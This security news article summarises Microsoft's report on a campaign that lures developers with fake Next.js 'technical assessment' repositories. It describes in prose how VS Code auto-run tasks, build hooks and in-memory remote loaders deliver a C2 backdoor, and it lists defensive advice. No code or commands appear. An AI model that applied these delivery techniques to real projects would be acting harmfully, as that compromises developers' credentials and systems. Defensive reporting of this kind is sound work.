Threat actors leveraged “technical assessment” projects, using consistent naming schemes to seamlessly integrate malicious cloning and build processes. They further concealed their operations by fetching loader scripts from external servers and reducing their digital footprint on compromised systems.
Microsoft has revealed a sophisticated campaign specifically targeting software developers. This attack involves malicious repositories cleverly disguised as genuine Next.js projects and standard technical evaluations.
Attackers designed this campaign with highly deceptive lures, enabling them to integrate covertly into common developer tasks like repository cloning, project opening, and build execution. This strategy ensured the malicious code ran without detection.
During an incident investigation, Microsoft gathered telemetry indicating this campaign is part of a larger threat landscape employing employment-themed deception. As stated in a recent Microsoft security blog post, “Initial analysis of Defender telemetry identified a specific group of malicious repositories linked to confirmed compromises.” The company added that “Subsequent investigations revealed more connected repositories that, while not explicitly logged, displayed identical execution methods, loader logic, and staging infrastructure.”
This operation capitalizes on developers’ inherent trust in shared code. By doing so, it establishes a foothold within critical developer systems, which typically house sensitive assets such as source code, environment configurations, credentials, and pathways to build or cloud environments.
Diverse Activation Methods for Remote Access
Microsoft’s research uncovered that these malicious repositories were designed with built-in redundancy, providing multiple ways for their code to execute, all leading to the same backdoor functionality.
Remarkably, in certain instances, merely opening the project within Visual Studio Code initiated the compromise. The attackers exploited workspace automation by embedding tasks that would execute automatically upon a folder being opened and trusted, thereby allowing code to run without any explicit action from the developer.
Other versions of this attack leverage standard build processes or server initialization sequences, guaranteeing that the harmful code activates whenever developers execute routine tasks like starting a development server. Irrespective of the specific trigger, these repositories download supplementary JavaScript files from external infrastructure and run them in memory, effectively minimizing their presence on the hard drive.
The downloaded malicious payload functions in distinct phases. Initially, a registration module identifies the compromised host and can issue foundational instructions. Subsequently, a dedicated C2 (command and control) controller ensures long-term persistence and facilitates further malicious activities, including deploying additional payloads and exfiltrating data.
Compromise Via Deceptive “Coding Assessment”
Microsoft’s investigation commenced by examining unusual outbound connections originating from Node.js processes communicating with servers under the attackers’ control. By correlating this network activity with process telemetry, analysts were able to trace the initial infection back to recruitment-related activities.
A specific repository, discovered on Bitbucket, was disguised as a technical assessment. It was found alongside another repository adhering to the “Cryptan-Platform-MVP1” naming scheme. Microsoft noted that “Numerous repositories adhered to consistent naming conventions and project ‘family’ structures, which facilitated focused searches for other related repositories not explicitly highlighted in initial telemetry, yet demonstrating identical execution and staging characteristics.”
Should an infection be suspected, Microsoft advises that organizations must promptly isolate compromised endpoints, identify the root process, and actively scan their systems for recurring communication with suspicious infrastructure. Given the potential for subsequent credential and session theft, incident responders are urged to assess identity risks, invalidate active sessions, and restrict access to high-risk SaaS applications to minimize further exposure during their investigation.
For long-term risk reduction, Microsoft emphasized the importance of reinforcing developer trust boundaries and mitigating execution risks. Additional recommendations include mandating Visual Studio Code Workspace Trust by default, implementing attack surface reduction rules, activating cloud-based reputation safeguards, and enhancing conditional access policies.
